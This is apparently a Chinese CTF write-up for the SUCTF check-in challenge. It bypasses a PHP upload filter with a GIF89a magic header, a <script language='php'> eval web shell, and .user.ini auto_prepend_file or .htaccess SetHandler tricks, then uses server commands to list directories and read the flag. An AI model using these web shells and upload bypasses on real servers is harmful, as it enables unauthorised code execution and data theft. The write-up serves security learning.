suctf-checkin+.user.ini+.htaccess绕过

前言

由这个题和MRCTF中的我传你吗这两个题总结.htaccess.user.ini绕过文件上传

wp

首先这个题就是用.user.ini或者.htaccess来绕过

我们传png文件,看到exif_imagetype:not image!

exif_imagetype,就是用来检查图像类型的

必须要gif文件,但是我们在文件内容上加个魔法头GIF89a,就可以绕过

我们用后缀为.user.ini或者.htaccess,发现只要加个魔法头都可以传进去

本来是直接用

<?php
    eval($_post[1]);   
?>

但是不行,返回contents有问题,说明对文件内容进行了过滤

我手工FUZZ了一下,<?被过滤了,其他都应该没有

然后换了个一句话木马

<script language='php'>eval($_POST[1]);</script>

我们可以传1.png文件进去,文件内容

GIF89a
一句话木马

再传.user.ini文件

文件内容
auto_prepend_file=/var/www/html/upload/....(路径)
auto_append_file=/var/www/html/upload/....(路径)

然后用蚁剑连接或者直接访问url,用命令执行

POST:1=var_dump(scandir("/"));找路径
然后1=var_dump(system("cat /f*"));

如果是.htaccess

只需要把文件内容改一下

SetHandler application/x-httpd-php,把全部文件都指定为php文件执行。

.user.ini绕过

.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

.htaccess绕过

[CTF].htaccess的使用技巧总结_Y4tacker的博客-优快云博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值